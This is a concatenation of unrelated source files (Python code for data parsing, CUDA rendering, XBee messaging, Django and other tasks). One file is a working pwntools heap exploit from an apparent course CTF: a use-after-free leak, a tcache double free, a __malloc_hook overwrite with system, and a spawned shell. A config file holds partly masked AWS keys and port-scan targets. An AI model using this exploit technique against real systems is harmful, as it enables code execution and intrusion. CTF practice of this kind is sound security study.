that\n\n for k, v in self.groups.items():\n print(k, str(v))\n# group = NXDL_element__group(nxdl_defaults.group)\n# obj = copy.deepcopy(group) # ALWAYS make a copy of that\n\n def set_file(self, fname):\n self.file_name = fname\n assert(os.path.exists(fname))\n self.title = os.path.split(fname)[-1].split('.')[0]\n self.category = os.path.split(os.path.dirname(fname))[-1]\n \n def parse(self):\n pass\n\n\nclass NXDL_element__attribute(Mixin):\n '''\n contents of a *attribute* element in a NXDL XML file\n '''\n \n def __init__(self, nxdl_defaults):\n for k, v in nxdl_defaults.__dict__.items():\n self.__setattr__(k, v)\n\n\nclass NXDL_element__field(Mixin):\n '''\n contents of a *field* element in a NXDL XML file\n '''\n\n\nclass NXDL_element__group(Mixin):\n '''\n contents of a *group* element in a NXDL XML file\n '''\n\n\nclass NXDL_element__link(Mixin):\n '''\n contents of a *link* element in a NXDL XML file\n '''\n\n\nclass NXDL_element__symbols(Mixin):\n '''\n contents of a *symbols* element in a NXDL XML file\n '''\n\n\n# class NXDL_ElementFactory(object):\n# '''\n# creates and serves new classes with proper default values from the NXDL rules\n# \n# called by :class:`punx.cache_manager.NXDL_File_Set()`\n# '''\n# \n# db = {} # internal set of known elements\n# file_set = None\n# creators = {\n# 'definition': NXDL_element__definition,\n# 'attribute': NXDL_element__attribute,\n# 'field': NXDL_element__field,\n# 'group': NXDL_element__group,\n# 'link': NXDL_element__link,\n# 'symbols': NXDL_element__symbols,\n# }\n# \n# def __init__(self, file_set):\n# self.file_set = file_set\n# \n# def get_element(self, element_name, parent=None):\n# '''\n# create a new element or get one already built with defaults from the XML Schema\n# '''\n# if element_name not in self.db:\n# if element_name 
== 'definition':\n# # special case\n# self.db[element_name] = NXDL_element__definition(self.file_set)\n# \n# elif element_name in self.creators.keys():\n# self.db[element_name] = self.creators[element_name](parent)\n# \n# else:\n# raise KeyError('unhandled NXDL element: ' + element_name)\n# \n# element = self.db[element_name]\n# element.nxdl = self.file_set.schema_manager.nxdl\n# \n# schema_types = element.nxdl.schema_types # alias\n# if element_name not in schema_types:\n# msg = 'unexpected element type: ' + element_name\n# msg += ', expected one of these: ' + ' '.join(sorted(schema_types.keys()))\n# raise KeyError(msg)\n# element.set_defaults(schema_types[element_name])\n# \n# element = copy.deepcopy(self.db[element_name])\n# \n# # TODO set the defaults accordingly for application definitions\n# \n# return element\n\n\ndef main():\n import punx.cache_manager\n cm = punx.cache_manager.CacheManager()\n if cm is not None and cm.default_file_set is not None:\n nxdl_dict = NXDL_Manager(cm.default_file_set).classes\n\n _t = True\n for k, v in nxdl_dict.items():\n print(v.category, k)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/punx/nxdl_manager.py","file_name":"nxdl_manager.py","file_ext":"py","file_size_in_byte":13867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"375960218","text":"import numpy as np\nfrom utils import load_all_pickles\nimport matplotlib.pyplot as plt\n\npath = 'logfiles/Beluga/accidentally_huge_outpaint'\n# unpickle outputs\noutputs = load_all_pickles(path)\n\n# find x and y stuff\nnruns = len(outputs)\nfilters = np.zeros(nruns)\nepoch = np.zeros(nruns)\nfilter_size = np.zeros(nruns)\nlayers = np.zeros(nruns)\nn_samples = np.zeros(nruns)\n\ndensity_overlap = np.zeros(nruns)\ninteractions_overlap = np.zeros(nruns)\nfourier_overlap = np.zeros(nruns)\naverage_density = np.zeros(nruns)\naverage_interactions = np.zeros(nruns)\nvariance = np.zeros(nruns)\npooled_variance = np.zeros(nruns)\nsamples=[]\n\nfor i in range(len(outputs)):\n filters[i] = outputs[i]['filters']\n epoch[i] = outputs[i]['epoch']\n filter_size[i] = outputs[i]['filter size']\n layers[i] = outputs[i]['layers']\n n_samples[i] = outputs[i]['n_samples']\n\n density_overlap[i] = outputs[i]['density overlap']\n interactions_overlap[i] = outputs[i]['interactions overlap']\n fourier_overlap[i] = outputs[i]['fourier overlap']\n average_density[i] = outputs[i]['average density']\n average_interactions[i] = outputs[i]['average interactions']\n variance[i] = outputs[i]['spatial variance']\n pooled_variance[i] = outputs[i]['pooled variance']\n samples.append(outputs[i]['sample'])\n\n# graph\n'''\nfilters = np.roll(filters[epoch!=-1].reshape(4,6),-1,axis=0)\nlayers = np.roll(layers[epoch!=-1].reshape(4,6), -1, axis=0)\ndensity_overlap = np.roll(density_overlap[epoch!=-1].reshape(4,6), -1, axis=0)\ninteractions_overlap = np.roll(interactions_overlap[epoch!=-1].reshape(4,6),-1,axis=0)\nfourier_overlap = np.roll(fourier_overlap[epoch!=-1].reshape(4,6), -1, axis = 0)\nvariance = np.roll(variance[epoch!=-1].reshape(4,6), -1, axis = 0)\npooled_variance = np.roll(pooled_variance[epoch!=-1].reshape(4,6), -1, axis = 0)\n\nfilters = np.roll(np.insert(filters[epoch!=-1],0,(0,0,0)).reshape(4,6),-1,axis=0)\nlayers = np.roll(np.insert(layers[epoch!=-1],0,(0,0,0)).reshape(4,6), -1, axis=0)\ndensity_overlap = np.roll(np.insert(density_overlap[epoch!=-1],0,(0,0,0)).reshape(4,6), -1, axis=0)\ninteractions_overlap = 
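# A more idiomatic way to pull each key out of `outputs` than the index
# loop above, sketched with list comprehensions (same values, same order):
filters_alt = np.array([o['filters'] for o in outputs])
density_overlap_alt = np.array([o['density overlap'] for o in outputs])
assert np.array_equal(filters_alt, filters)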
np.roll(np.insert(interactions_overlap[epoch!=-1],0,(0,0,0)).reshape(4,6),-1,axis=0)\nfourier_overlap = np.roll(np.insert(fourier_overlap[epoch!=-1],0,(0,0,0)).reshape(4,6), -1, axis = 0)\nvariance = np.roll(np.insert(variance[epoch!=-1],0,(0,0,0)).reshape(4,6), -1, axis = 0)\npooled_variance = np.roll(np.insert(pooled_variance[epoch!=-1],0,(0,0,0)).reshape(4,6), -1, axis = 0)\n'''","sub_path":"analysis_scripts/Hyperparameter_Outputs-DESKTOP-OVNVDG1.py","file_name":"Hyperparameter_Outputs-DESKTOP-OVNVDG1.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"557362864","text":"from pwn import *\n\nr = process('./t-note')\n#r = remote('edu-ctf.csie.org', 10179)\nelf = ELF('./libc.so')\n\nif sys.argv[1] == 'debug': raw_input('debug')\n\ndef add(size, data):\n r.sendafter('> ', '1')\n r.sendafter('Size: ', str(size))\n r.sendafter('Note: ', data)\n\ndef show(index):\n r.sendafter('> ', '2')\n r.sendafter('Which note do you want to show?\\nIndex: ', str(index))\n\ndef delete(index):\n r.sendafter('> ', '3')\n r.sendafter('Which note do you want to delete?\\nIndex: ', str(index))\n\nadd(0x410, 'a')\nadd(0x20, 'b')\n\ndelete(0)\nshow(0)\nr.recvline()\nelf.address = u64(r.recv(6) + '\\0\\0') - 0x3ebca0\n\ndelete(1)\ndelete(1)\n\nadd(0x20, p64(elf.sym.__malloc_hook))\nadd(0x20, 'c')\n\nadd(0x20, p64(elf.sym.system))\n\nr.sendafter('> ', '1')\nr.sendafter('Size: ', str(elf.search('/bin/sh').next()))\n\n\nr.interactive()\n","sub_path":"Games/SecureProgramming2019/T-Note/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"104936584","text":"# -*- coding: utf-8 -*-\n# This token is invalid, don't even bother trying :)\naws_access_key_id = 'AK****'\naws_secret_access_key = '3ELSX7y****' \naws_session_token = None \nregion_name = 'eu-west-2'\nbotocore_session = None\nprofile_name = None\nname_tag = 'Slastikhin'\nowner_id = '7179*****'\t\t\t# Needed for the AMI filter\nhosts = ['a.ztest.pp.ua','b.ztest.pp.ua','c.ztest.pp.ua']\nscan_ports = [80,22,3389]\nsocket_timeout = 1","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"533035985","text":"from numba import cuda as nbcuda\nimport numpy as np\nimport math\n\n@nbcuda.jit(device = True)\ndef length(vector):\n\treturn math.sqrt(vector[0]**2.0 + vector[1]**2.0 + vector[2]**2.0)\n\n@nbcuda.jit(device = True)\ndef dot(vector1, vector2):\n\treturn vector1[0]*vector2[0] + vector1[1]*vector2[1] + vector1[2]*vector2[2]\n\n@nbcuda.jit(device = True)\ndef normalize(vector):\n\tdot_p = dot(vector, vector)\n\n\treturn (vector[0]/math.sqrt(dot_p), vector[1]/math.sqrt(dot_p), vector[2]/math.sqrt(dot_p))\n\n@nbcuda.jit(device = True)\ndef clip(n):\n\tif n > 255:\n\t\tn = 255\n\telif n < 0:\n\t\tn = 0\n\treturn n\n\n@nbcuda.jit(device = True)\ndef clipWithBounds(n, n_min, n_max):\n\tif n > n_max:\n\t\treturn n_max\n\telse:\n\t\tif n < n_min:\n\t\t\treturn n_min\n\t\telse:\n\t\t\treturn n\n\n@nbcuda.jit(device = True)\ndef yRotate(pos, theta):\n\tc = math.cos(theta)\n\ts = math.sin(theta)\n\n\treturn (c*pos[0] + s*pos[2], pos[1], -s*pos[0] + c*pos[2])\n\n@nbcuda.jit(device = True)\ndef func(c, r, s, id_, volSize, params):\n\tpos0 = (volSize[0]/2, volSize[1]/2, volSize[2]/2)\n\n\tdx = float(c - pos0[0])\n\tdy = float(r - 
pos0[1])\n\tdz = float(s - pos0[2])\n\n\tif id_ == 0: #Sphere\n\t\treturn math.sqrt(dx*dx + dy*dy + dz*dz) - params[0]\n\n\telif id_ == 1: #Torus\n\t\tr = math.sqrt(dx*dx + dy*dy)\n\t\treturn math.sqrt((r - params[0])*(r - params[0]) + dz*dz) - params[1]\n\n\telif id_ == 2: #Block\n\t\tx = abs(dx) - params[0]\n\t\ty = abs(dy) - params[1]\n\t\tz = abs(dz) - params[2]\n\t\tif x <= 0 and y <= 0 and z <= 0:\n\t\t\treturn max(x, max(y,z))\n\t\telse:\n\t\t\tx = max(x, 0)\n\t\t\ty = max(y, 0)\n\t\t\tz = max(z, 0)\n\t\t\treturn math.sqrt(x*x + y*y + z*z)\n\n@nbcuda.jit(device = True)\ndef scrIdxToPos(c, r, w, h, zs):\n\treturn (c - w/2.0, r - h/2.0, zs)\n\n@nbcuda.jit(device = True)\ndef paramRay(ray, t):\n\treturn (ray[0][0] + t*(ray[1][0]),\n\t\t\tray[0][1] + t*(ray[1][1]),\n\t\t\tray[0][2] + t*(ray[1][2]))\n\n@nbcuda.jit(device = True)\ndef intersectBox(ray, boxmin, boxmax):\n\tif ray[1][0] == 0.0:\n\t\tinvr_x = np.inf\n\telse:\n\t\tinvr_x = 1.0/ray[1][0]\n\n\tif ray[1][1] == 0.0:\n\t\tinvr_y = np.inf\n\telse:\n\t\tinvr_y = 1.0/ray[1][1]\n\n\tif ray[1][2] == 0.0:\n\t\tinvr_z = np.inf\n\telse:\n\t\tinvr_z = 1.0/ray[1][2]\n\n\tinvR = (invr_x,\n\t\t\tinvr_y,\n\t\t\tinvr_z)\n\n\ttbot = (invR[0]*(boxmin[0] - ray[0][0]),\n\t\t\tinvR[1]*(boxmin[1] - ray[0][1]),\n\t\t\tinvR[2]*(boxmin[2] - ray[0][2]))\n\n\tttop = (invR[0]*(boxmax[0] - ray[0][0]),\n\t\t\tinvR[1]*(boxmax[1] - ray[0][1]),\n\t\t\tinvR[2]*(boxmax[2] - ray[0][2]))\n\n\ttmin = (min(ttop[0], tbot[0]),\n\t\t\tmin(ttop[1], tbot[1]),\n\t\t\tmin(ttop[2], tbot[2]))\n\n\ttmax = (max(ttop[0], tbot[0]),\n\t\t\tmax(ttop[1], tbot[1]),\n\t\t\tmax(ttop[2], tbot[2]))\n\n\ttnear = max(max(tmin[0], tmin[1]), max(tmin[0], tmin[2]))\n\ttfar = min(min(tmax[0], tmax[1]), min(tmax[0], tmax[2]))\n\n\treturn (tfar > tnear, tnear, tfar)\n\n@nbcuda.jit(device = True)\ndef posToVolIndex(pos, volSize):\n\treturn (int(pos[0] + volSize[0]/2.0), int(pos[1] + volSize[1]/2.0), int(pos[2] + volSize[2]/2.0))\n\n@nbcuda.jit(device = True)\ndef flatten(index, volSize):\n\treturn int(index[0] + index[1]*volSize[0] + index[2]*volSize[0]*volSize[1])\n\n@nbcuda.jit(device = True)\ndef density(d_vol, volSize, pos):\n\tvol_index = posToVolIndex(pos, volSize)\n\n\ti = vol_index[0]\n\tj = vol_index[1]\n\tk = vol_index[2]\n\n\tw = volSize[0]\n\th = volSize[1]\n\td = volSize[2]\n\n\trem = (pos[0] - math.floor(pos[0]),\n\t\t pos[1] - math.floor(pos[1]),\n\t\t pos[2] - math.floor(pos[2]))\n\n\tindex = (clipWithBounds(i, 0, w - 2),\n\t\t\t clipWithBounds(j, 0, h - 2),\n\t\t\t clipWithBounds(k, 0, d - 2))\n\n\tdens000 = d_vol[flatten(index, volSize)]\n\tdens100 = d_vol[flatten((index[0] + 1, index[1], index[2]), volSize)]\n\tdens010 = d_vol[flatten((index[0], index[1] + 1, index[2]), volSize)]\n\tdens001 = d_vol[flatten((index[0], index[1], index[2] + 1), volSize)]\n\tdens110 = d_vol[flatten((index[0] + 1, index[1] + 1, index[2]), volSize)]\n\tdens101 = d_vol[flatten((index[0] + 1, index[1], index[2] + 1), volSize)]\n\tdens011 = d_vol[flatten((index[0], index[1] + 1, index[2] + 1), volSize)]\n\tdens111 = d_vol[flatten((index[0] + 1, index[1] + 1, index[2] + 1), volSize)]\n\n\treturn dens000*(1 - rem[0])*(1 - rem[1])*(1 - rem[2]) + \\\n\t\t dens100*(rem[0])*(1 - rem[1])*(1 - rem[2]) + \\\n\t\t dens010*(1 - rem[0])*(rem[1])*(1 - rem[2]) + \\\n\t\t dens001*(1 - rem[0])*(1 - rem[1])*(rem[2]) + \\\n\t\t dens110*(rem[0])*(rem[1])*(1 - rem[2]) + \\\n\t\t dens101*(rem[0])*(1 - rem[1])*(rem[2]) + \\\n\t\t dens011*(1 - rem[0])*(rem[1])*(rem[2]) + \\\n\t\t 
dens111*(rem[0])*(rem[1])*(rem[2])\n\n@nbcuda.jit(device = True)\ndef rayCastShader(d_vol, volSize, boxRay, threshold, EPS):\n\tshade = (96, 0, 192, 0)\n\n\tpos = boxRay[0]\n\n\tlen_ = length(boxRay[1])\n\n\tf = density(d_vol, volSize, pos)\n\n\tt = 0.0\n\twhile f > threshold + EPS and t < 1.0:\n\t\tt += (f - threshold)/len_\n\n\t\tpos = paramRay(boxRay, t)\n\n\t\tf = density(d_vol, volSize, pos)\n\n\tif t < 1.0:\n\t\tgrad = ((density(d_vol, volSize, (pos[0] + EPS, pos[1], pos[2])) - density(d_vol, volSize, pos))/EPS,\n\t\t\t\t(density(d_vol, volSize, (pos[0], pos[1] + EPS, pos[2])) - density(d_vol, volSize, pos))/EPS,\n\t\t\t\t(density(d_vol, volSize, (pos[0], pos[1], pos[2] + EPS)) - density(d_vol, volSize, pos))/EPS)\n\n\t\tgrad_norm = normalize(grad)\n\t\tboxray_norm = normalize(boxRay[1])\n\n\t\tintensity = -1*(grad_norm[0]*boxray_norm[0] + grad_norm[1]*boxray_norm[1] + grad_norm[2]*boxray_norm[2])\n\n\t\tshade = (int(255*intensity), int(0*intensity), int(0*intensity), 0)\n\n\treturn shade\n\n@nbcuda.jit(device = True)\ndef planeSDF(pos, norm, d):\n\treturn dot(pos, normalize(norm)) - d\n\n@nbcuda.jit(device = True)\ndef rayPlaneIntersect(myRay, n, dist):\n\tf0 = planeSDF(paramRay(myRay, 0.0), n, dist)\n\tf1 = planeSDF(paramRay(myRay, 1.0), n, dist)\n\n\tresult = (f0 * f1 < 0)\n\n\tt = 0.0\n\tif result:\n\t\tt = (0 - f0)/(f1 - f0)\n\n\treturn result, t\n\n@nbcuda.jit(device = True)\ndef sliceShader(d_vol, volSize, boxRay, gain, dist, norm):\n\tshade = (96, 0, 192, 0)\n\n\tresult, t = rayPlaneIntersect(boxRay, norm, dist)\n\tif result:\n\t\tsliceDens = density(d_vol, volSize, paramRay(boxRay, t))\n\t\tshade = (int(48), int(clip(-10*(1.0 + gain)*sliceDens)), int(96), int(255))\n\n\treturn shade\n\n@nbcuda.jit(device = True)\ndef volumeRenderShader(d_vol, volSize, boxRay, threshold, numSteps):\n\tshade = (96, 0, 192, 0)\n\n\tdt = 1.0/numSteps\n\tlen_ = length(boxRay[1])/numSteps\n\tpos = boxRay[0]\n\tval = density(d_vol, volSize, pos)\n\n\taccum = 0.0\n\tt = 0.0\n\n\twhile t < 1:\n\n\t\tif val - threshold < 0.0:\n\t\t\taccum += abs(val - threshold)*len_\n\n\t\tpos = paramRay(boxRay, t)\n\n\t\tval = density(d_vol, volSize, pos)\n\n\t\tt += dt\n\n\tif clip(accum) > 0.0:\n\t\tshade = (96, int(clip(accum)), 192, 0)\n\n\treturn shade","sub_path":"vis_3d/device_funcs.py","file_name":"device_funcs.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"553821988","text":"from apscheduler.schedulers.background import BackgroundScheduler\nfrom xbee import XBee, python2to3\nfrom observer import Observer, observes\nimport itertools\n\ndef format_address(int_addr):\n \"\"\"\n Convert an integer to a 16-bit byte string\n \"\"\"\n high_byte = python2to3.intToByte((int_addr & 0xFF00) >> 8)\n low_byte = python2to3.intToByte(int_addr & 0xFF)\n return high_byte + low_byte\n\ndef parse_address(byte_addr):\n \"\"\"\n Convert a 16-bit address byte string to an integer\n \"\"\"\n high_byte = python2to3.byteToInt(byte_addr[0])\n low_byte = python2to3.byteToInt(byte_addr[1])\n return (high_byte << 8) + low_byte\n\ndef parse_rssi(bytes_rssi):\n \"\"\"\n Convert an RSSI byte into a signed integer\n \"\"\"\n return 0 - python2to3.byteToInt(bytes_rssi)\n\n__id_gen__ = itertools.cycle(python2to3.intToByte(val) for val in range(1, 256))\ndef next_id():\n return __id_gen__.next()\n\n# Cruft to throw into ping message to make it long\nPING_FILLER = bytes(bytearray(b'\\x00' for _ in range(100)))\n\nclass RetryInfo(object):\n \"\"\"\n 
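# A host-side NumPy sketch of the trilinear interpolation that density()
# in vis_3d/device_funcs.py above performs on the GPU; the array and
# function names here are illustrative, and the device version first
# offsets pos by half the volume size via posToVolIndex():
import numpy as np

def density_host(vol, pos):
    # vol is a 3D array indexed [x, y, z]; pos is a float coordinate
    base = np.floor(pos).astype(int)
    fx, fy, fz = pos - base            # fractional parts = blend weights
    x, y, z = np.clip(base, 0, np.array(vol.shape) - 2)
    return (vol[x, y, z] * (1 - fx) * (1 - fy) * (1 - fz)
            + vol[x + 1, y, z] * fx * (1 - fy) * (1 - fz)
            + vol[x, y + 1, z] * (1 - fx) * fy * (1 - fz)
            + vol[x, y, z + 1] * (1 - fx) * (1 - fy) * fz
            + vol[x + 1, y + 1, z] * fx * fy * (1 - fz)
            + vol[x + 1, y, z + 1] * fx * (1 - fy) * fz
            + vol[x, y + 1, z + 1] * (1 - fx) * fy * fz
            + vol[x + 1, y + 1, z + 1] * fx * fy * fz)

# on a constant volume the blend returns that constant, e.g.
# density_host(np.ones((4, 4, 4)), np.array([1.5, 1.5, 1.5])) == 1.0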
Holds info for a message that requires\n acknowledgment / retries\n \"\"\"\n def __init__(self, message, retries=0):\n self.message = message\n self.msg_id = message['data'][0]\n self.retries = retries\n\n# spec for input messages mapped by msg id in frame\n# spec describes frame contents in order\n# spec = (\n# 'name',\n# 'len(int) / delimiter(byte) / None(handled by parser)',\n# 'parsing func'\n# )\nrx_msg_specs = {\n b'\\x10': {\n 'name': 'node_broadcast',\n 'spec': []\n },\n b'\\x12': {\n 'name': 'neighbor_rssi_update',\n 'spec': [\n ('neighbor_rssi', 1, parse_rssi)\n ]\n },\n b'\\x26': {\n 'name': 'ping_response',\n 'spec': [\n ('ping_id', 1, python2to3.byteToInt)\n ]\n },\n b'\\x27': {\n 'name': 'ack',\n 'spec': [\n ('ack_id', 1, python2to3.byteToInt)\n ]\n },\n b'\\x31': {\n 'name': 'lost_rear_broadcast',\n 'spec': []\n },\n b'\\x33': {\n 'name': 'lost_node_notice',\n 'spec': []\n }\n # b'\\x22': self.parse_chain_update,\n}\n\nclass Messenger:\n \"\"\"\n Wraps an XBee object and translates\n XBee packets into application specific messages\n \"\"\"\n __metaclass__ = Observer\n\n def __init__(self, xbee=None, scheduler=None):\n self.xbee = xbee\n self.scheduler = scheduler\n self._retry_jobs = {}\n self._callbacks = []\n\n def set_xbee(self, xbee):\n self.xbee = xbee\n\n def set_scheduler(self, scheduler):\n self.scheduler = scheduler\n\n def register_callback(self, callback):\n \"\"\"\n Allows an observer to register a callback to be \n invoked when a message is received\n \"\"\"\n self._callbacks.append(callback)\n\n def report_message(self, name, *args, **kwargs):\n \"\"\"\n Report a received message to observers\n \"\"\"\n for callback in self._callbacks:\n try:\n callback(name, *args, **kwargs)\n except:\n raise NotImplementedError(\"blah\")\n\n def send_with_retry(self, retry_info):\n \"\"\"\n Send a message, then set a job to retry the message\n if an acknowledgment is not received. 
Stop\n job if retries exceeded.\n \"\"\"\n self.xbee.tx(**retry_info.message)\n retry_job = self._retry_jobs.get(retry_info.msg_id, None)\n if not retry_job and self.scheduler:\n retry_job = self.scheduler.add_job(self.send_with_retry,\\\n 'interval', seconds=1, args=[retry_info])\n self._retry_jobs[retry_info.msg_id] = retry_job\n\n if self.scheduler:\n retry_info.retries += 1\n if retry_info.retries > 3:\n self.report_message('message_timed_out', **{\n 'message_id': python2to3.byteToInt(retry_info.msg_id)\n })\n retry_job.remove()\n del self._retry_jobs[retry_info.msg_id]\n\n @observes('at_response')\n def at_command_parse(self, status, command, parameter):\n \"\"\"\n Parse response to AT command sent to XBee radio.\n \"\"\"\n if str(command) == \"MY\" and status == b'\\x00':\n app_msg = {\"address\": parse_address(parameter)}\n self.report_message('self_address', **app_msg)\n\n @observes('rx')\n def parse_rx(self, source_addr, rssi, rf_data):\n \"\"\"\n Determine if parser exists for application\n level message in XBee frame, then invoke parser\n \"\"\"\n if len(rf_data) < 2:\n return\n\n msg = {\n 'source_addr': parse_address(source_addr),\n 'rssi': parse_rssi(rssi),\n 'msg_id': python2to3.byteToInt(rf_data[0])\n }\n\n spec = rx_msg_specs.get(rf_data[1], None)\n rf_data = rf_data[2:]\n if spec:\n msg_name = spec['name']\n attrs = spec['spec']\n for name,length,parser in attrs:\n if len(rf_data) < length:\n return\n msg[name] = parser(rf_data[:length])\n rf_data = rf_data[length:]\n self.report_message(msg_name, **msg)\n \n # def parse_app_ack(self, packet):\n # \"\"\"\n # Parse acknowledgment sent from other node for\n # a message that contains an application level\n # id. Remove retry job if it exists.\n # \"\"\"\n # app_frame_id = packet['rf_data'][2]\n # retry_job = self.retry_jobs.get(app_frame_id, None)\n # if retry_job:\n # retry_job.remove()\n # app_msg = {'app_frame_id': python2to3.byteToInt(app_frame_id)}\n # self.report_message('command_acknowledged', **app_msg)\n\n def request_device_address(self):\n \"\"\"\n Send a command to the attached XBee radio requesting its\n configured 16-bit address.\n \"\"\"\n command = {\n 'command': python2to3.stringToBytes('MY'),\n 'parameter': b'\\x00\\x00'\n }\n self.xbee.at(**command)\n\n def send_neighbor_rssi(self, neighbor, rssi):\n \"\"\"\n Notify a node of our sensed rssi in regards to it.\n \"\"\"\n message = {\n 'dest_addr': format_address(neighbor),\n 'data': b'\\x00\\x12' + python2to3.intToByte(0 - rssi)\n }\n self.xbee.tx(**message)\n\n def send_ping(self, rear_node, front_node):\n \"\"\"\n Send a ping that travels to the furthest node, \n then returns giving an indication of connection \n strength through the chain.\n \"\"\"\n ping_id = next_id()\n message = {\n 'dest_addr': format_address(rear_node),\n 'data': b'\\x00\\x24' + ping_id + format_address(front_node) + PING_FILLER\n }\n\n self.xbee.tx(**message)\n return python2to3.byteToInt(ping_id)\n\n def assign_neighbors(self, node_addr, rear_node, front_node):\n \"\"\"\n Send a message to a node assigning its front and rear neighbors.\n \"\"\"\n msg_id = next_id()\n message = {\n 'dest_addr': format_address(node_addr),\n 'data': msg_id + b'\\x28' + format_address(rear_node) + format_address(front_node)\n }\n\n self.send_with_retry(RetryInfo(message))\n return python2to3.byteToInt(msg_id)\n\n def deploy(self, node_addr):\n \"\"\"\n Notify a node it may deploy and proceed to move forward.\n \"\"\"\n msg_id = next_id()\n message = {\n 'dest_addr': format_address(node_addr),\n 
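# A small self-check sketch for the 16-bit address helpers at the top of
# breadcrumbs/messenger.py: with the high byte shifted by 8,
# format_address() and parse_address() invert each other for any 16-bit
# value (the sample addresses below are arbitrary):
def _check_address_round_trip():
    for addr in (0x0000, 0x00FF, 0x1234, 0xFFFF):
        assert parse_address(format_address(addr)) == addr
# call _check_address_round_trip() to verify the pair of helpers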
'data': msg_id + b'\\x30'\n }\n\n self.send_with_retry(RetryInfo(message))\n return python2to3.byteToInt(msg_id)\n\n def lost_rear_acknowledge(self, node_addr):\n \"\"\"\n If a node is broadcasting it has lost the node to its rear,\n send it a message acknowledging it. We will then be its neighbor\n to the rear.\n \"\"\"\n msg_id = next_id()\n message = {\n 'dest_addr': format_address(node_addr),\n 'data': msg_id + b'\\x32'\n }\n\n self.send_with_retry(RetryInfo(message))\n return python2to3.byteToInt(msg_id)\n","sub_path":"breadcrumbs/messenger.py","file_name":"messenger.py","file_ext":"py","file_size_in_byte":8174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"394719531","text":"from turtle import *\nimport math \nglobal a\na =16\ndef p_strona(n):\n for i in range(n):\n cool(1)\n setheading(0)\n fd(a)\n lt(45)\n fd(4*a*math.sqrt(2))\n lt(135)\n fd(1.25*a)\ndef l_strona(n):\n for i in range(n):\n cool(1)\n setheading(135)\n fd(4*a*math.sqrt(2))\n setheading(0)\n fd(a)\n pd()\ndef DRZEWO(n):\n pu()\n setpos(0,-200)\n pd()\n p_strona(n)\n pu()\n setpos(0,-200)\n pd()\n l_strona(n)\n\ndef kwadrat(x):\n setheading(0)\n fillcolor(x)\n begin_fill()\n for i in range(4):\n fd(a)\n lt(90)\n end_fill()\ndef cool(x):\n czastka_a(\"skyblue\")\n czastka_b(\"skyblue\")\n\ndef czastka_b(x):\n setheading(0)\n pu()\n fd(2*a)\n pd()\n for i in range(2):\n kwadrat(x)\n pu()\n fd(1.5*a)\n pd()\n pu()\n rt(180)\n fd(2.25*a)\n setheading(-90)\n fd(a)\n pd()\n for i in range(2):\n pd()\n kwadrat(x)\n pu()\n rt(180)\n fd(a)\n lt(90)\n fd(a)\n\n \ndef czastka_a(x):\n kwadrat(x)\n setheading(90)\n fd(a)\n lt(90)\n fd(0.75*a)\n for i in range(2):\n pd()\n kwadrat(x)\n setheading(90)\n fd(a)\n lt(90)\n pu()\n fd(a)\n rt(180)\n fd(0.25*a)\n pd()\n kwadrat(x)\n fd(1.5*a)\n kwadrat(x)\nspeed(0) \nDRZEWO(7)\n \n\n\n","sub_path":"drzewo.py","file_name":"drzewo.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"303361698","text":"__author__ = 'danielebrandimarte'\n\nfrom rest_framework import serializers\nfrom notes.models import Section, Chapter, LibraryText\n\nclass SectionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Section\n fields = ('id','display_title','parent','chapter')\n\nclass ChapterSerializer(serializers.ModelSerializer):\n class Meta:\n model = Chapter\n fields = ('code','display_title')\n\n\nclass LibraryTextSerializer(serializers.ModelSerializer):\n\n title = serializers.CharField(allow_blank=True, allow_null=True, max_length=200, required=True)\n body = serializers.CharField(allow_null=True, required=True, style={'base_template': 'textarea.html'})\n\n class Meta:\n model = LibraryText\n fields = ('id', 'title', 'body', 'type', 'section')","sub_path":"notes/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"400328465","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\nimport ctstem_app.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ctstem_app', '0152_auto_20190122_1316'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='usergroup',\n name='icon',\n field=models.ImageField(help_text=b'Upload 400x289 png image that represents this class', upload_to=ctstem_app.models.upload_file_to, blank=True),\n ),\n 
]\n","sub_path":"ctstem_site/ctstem_app/migrations/0153_usergroup_icon.py","file_name":"0153_usergroup_icon.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"222424248","text":"def goldmine(c):\n X = [[c[i][j] for i in range(len(c))] for j in range(len(c[0]))]\n minimum = -1\n count = max((X[0]))\n left =-1\n right=-1\n initialj = X[0].index(count)\n for a in range(1,len(X)):\n if(initialj>0):\n left = initialj-1\n if(initialj 0\n\n viewer = HSIViewer(hsi_file)\n viewer.show_hsi_as_rgb(gain=1.5, highlights=edges, highlight_colors=[[1, 0, 0]])\n\n\n# transfer to ipython when ready\ndef test_rgb():\n # test of superpixel algorithm and comparison against scikit-image implementation\n # from skimage.segmentation import slic as sk_slic\n import cv2 as cv\n from alex.hsi import hd_manipulator\n from alex.plant_classifier.sk_slic_copy import slic_superpixels\n #from skimage.segmentation import slic_superpixels\n\n img = cv.imread(\"test_images/goat.jpg\")\n img = cv.resize(img, (0, 0), fx=1, fy=1)\n hdm = hd_manipulator.HDManipulator(cv.cvtColor(img, cv.COLOR_BGR2LAB), feature_first=False)\n\n slic = SLIC(hdm.convert_to_feat_first())\n\n ref_labels = slic_superpixels.slic(cv.cvtColor(img, cv.COLOR_BGR2LAB), n_segments=100, 